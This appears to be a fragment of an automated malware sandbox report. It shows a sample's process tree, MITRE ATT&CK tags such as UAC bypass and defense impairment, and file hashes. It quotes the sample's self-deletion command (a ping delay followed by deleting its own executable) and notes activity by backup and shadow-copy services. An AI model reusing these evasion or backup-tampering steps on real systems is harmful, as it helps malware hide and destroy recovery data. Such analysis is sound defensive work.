C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe"2⤵PID:852
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:7944
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1756
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5032
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2184
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:8872
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 6848 -ip 68481⤵PID:8404
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5c8a8eb6a993d1e12d40c6fb45e63dd41
SHA15c7b7f28e9e722839de75614d6004e13584d1cb5
SHA256b083ce86680889286f71b872534907427e24bd7df909b45db2336825db2cc76b
SHA5128f3e187c640b12c6e7366650a3864843252659acd935da8bdf146de940905c0e04de16ee0b4266f0d9e6013c805556b9ac082b81c04ce13c486b41e634424f67
-
Filesize
12KB
MD5a7c52167c4d3ea7c9f92b4d5e9fcde5b
SHA18ace7faf4dc55f21aa6eb2bc72ae078ff260d785
SHA2565edca68ba3aa166910dddb0e8a55164fe34dc453e2756576d8bddf77b87ed1eb
SHA512b1d62b7bae8c2e282861fbe177d129083e4253f1cebe7fa5954bbc54ad154a3ae05c07547b8db2765196fb7fe13055af2bc44c78a03913406215ad7f318b68dc
-
Filesize
684B
MD5c6b1c4883457be6beb60fe647b83e786
SHA1290457f7bb794bb863e7efde10d6b6869421ee81
SHA2565d3036596602fec95bcb11ab94c75af5294b29da1138ccc6390d757e1625209e
SHA512b1c7ccbd8ac2ef43a4dd5923fef0da92004c7efec71d1b052e8e893e9e1ab6969f065453c1e4dabe396e904f01f21af28b43e764e9f02b6687248c2cab4aebc4